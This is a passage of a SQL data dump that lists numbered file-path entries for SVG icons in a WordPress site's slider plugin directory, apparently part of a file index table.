oney2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money2.svg'),(2629,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money3.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money3.svg'),(2630,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money4.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money4.svg'),(2631,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money5.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money5.svg'),(2632,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money6.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money6.svg'),(2633,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/monitor.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/monitor.svg'),(2634,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/mouse.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/mouse.svg'),(2635,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/nest-money.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/nest-money.svg'),(2636,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper-jobs.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper-jobs.svg'),(2637,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper-pen.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper-pen.svg'),(2638,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper.svg'),(2639,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/note-paper.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/note-paper.svg'),(2640,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/office-chair.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/office-chair.svg'),(2641,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/open-sign.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/open-sign.svg'),(2642,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/outgoing.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/outgoing.svg'),(2643,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-clip.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-clip.svg'),(2644,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-plane.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-plane.svg'),(2645,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pen.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pen.svg'),(2646,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pen2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pen2.svg'),(2647,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pencil.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pencil.svg'),(2648,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pens-pencils.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pens-pencils.svg'),(2649,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-arrows06.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-arrows06.svg'),(2650,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-gears.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-gears.svg'),(2651,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-handshake.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-handshake.svg'),(2652,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-idea.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-idea.svg'),(2653,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-meeting.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-meeting.svg'),(2654,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-meeting02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-meeting02.svg'),(2655,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search01.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search01.svg'),(2656,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search02.svg'),(2657,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure.svg'),(2658,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure01.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure01.svg'),(2659,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure02.svg'),(2660,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure03.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure03.svg'),(2661,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure04.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure04.svg'),(2662,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure05.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure05.svg'),(2663,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure06.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure06.svg'),(2664,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure07.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure07.svg'),(2665,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/percent.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/percent.svg'),(2666,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/periscopemoney.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/periscopemoney.svg'),(2667,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows01.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows01.svg'),(2668,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows012.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows012.svg'),(2669,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows02.svg'),(2670,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows022.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows022.svg'),(2671,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows03.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows03.svg'),(2672,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-checkmark.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-checkmark.svg'),(2673,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-cross.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-cross.svg'),(2674,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-data.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-data.svg'),(2675,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-dollar.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-dollar.svg'),(2676,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-finance.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-finance.svg'),(2677,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-flag.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-flag.svg'),(2678,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-globe.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-globe.svg'),(2679,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-idea02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-idea02.svg'),(2680,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-info.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-info.svg'),(2681,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-puzzle.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-puzzle.svg'),(2682,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-scales.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-scales.svg'),(2683,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-time.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-time.svg'),(2684,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-umbrella.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-umbrella.svg'),(2685,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/phone.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/phone.svg'),(2686,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pie-chart01.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pie-chart01.svg'),(2687,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pie-chart02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pie-chart02.svg'),(2688,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/piggy-bank.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/piggy-bank.svg'),(2689,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pin.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pin.svg'),(2690,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/plant-money.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/plant-money.svg'),(2691,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/plant.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/plant.svg'),(2692,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pound.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pound.svg'),(2693,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/presentation.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/presentation.svg'),(2694,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/presentation02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/presentation02.svg'),(2695,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart02.svg'),(2696,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart03.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart03.svg'),(2697,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart04.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart04.svg'),(2698,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-laurels.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-laurels.svg'),(2699,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-megaphone.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-megaphone.svg'),(2700,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-stairs.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-stairs.svg'),(2701,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/printer.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/printer.svg'),(2702,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/profile.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/profile.svg'),(2703,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pulse.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pulse.svg'),(2704,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/puzzle.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/puzzle.svg'),(2705,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/quill.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/quill.svg'),(2706,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/recycle.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/recycle.svg'),(2707,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/rocket.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/rocket.svg'),(2708,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/rocket2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/rocket2.svg'),(2709,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruble.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruble.svg'),(2710,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruler-compasses.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruler-compasses.svg'),(2711,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/safe.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/safe.svg'),(2712,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/sale-sign.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/sale-sign.svg'),(2713,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/satellite-dish.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/satellite-dish.svg'),(2714,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/scales.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/scales.svg'),(2715,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/scissors.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/scissors.svg'),(2716,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/security.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/security.svg'),(2717,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/send.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/send.svg'),(2718,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/shield.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/shield.svg'),(2719,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/shopping-cart.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/shopping-cart.svg'),(2720,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/sign.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/sign.svg'),(2721,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-chart.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-chart.svg'),(2722,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-exclamation.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-exclamation.svg'),(2723,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-gears.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-gears.svg'),(2724,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-growth.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-growth.svg'),(2725,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-money.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-money.svg'),(2726,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-user.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-user.svg'),(2727,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone.svg'),(2728,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speaker.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speaker.svg'),(2729,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speaker02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speaker02.svg'),(2730,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speech-bubble.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speech-bubble.svg'),(2731,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/stamp.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/stamp.svg'),(2732,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/star.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/star.svg'),(2733,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/steering-wheel.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/steering-wheel.svg'),(2734,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy03.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy03.svg'),(2735,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy1.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy1.svg'),(2736,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy2.svg'),(2737,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/support-person.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/support-person.svg'),(2738,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-article.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-article.svg'),(2739,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart.svg'),(2740,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart2.svg'),(2741,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart3.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart3.svg'),(2742,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-pie-chart.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-pie-chart.svg'),(2743,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-pie-chart2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-pie-chart2.svg'),(2744,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet.svg'),(2745,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/target.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/target.svg'),(2746,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/team.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/team.svg'),(2747,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/telescope.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/telescope.svg'),(2748,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tie.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tie.svg'),(2749,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools.svg'),(2750,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools2.svg'),(2751,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/trash-bin.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/trash-bin.svg'),(2752,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/umbrella.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/umbrella.svg'),(2753,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user01.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user01.svg'),(2754,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user02.svg'),(2755,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user03.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user03.svg'),(2756,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user04.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user04.svg'),(2757,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user05.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user05.svg'),(2758,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user06.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user06.svg'),(2759,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user07.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user07.svg'),(2760,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user08.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user08.svg'),(2761,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user09.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user09.svg'),(2762,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/users.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/users.svg'),(2763,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/venn-diagram.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/venn-diagram.svg'),(2764,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wallet.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wallet.svg'),(2765,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wrench.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wrench.svg'),(2766,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/yen.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/yen.svg'),(2767,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/yinyang.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/yinyang.svg'),(2768,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/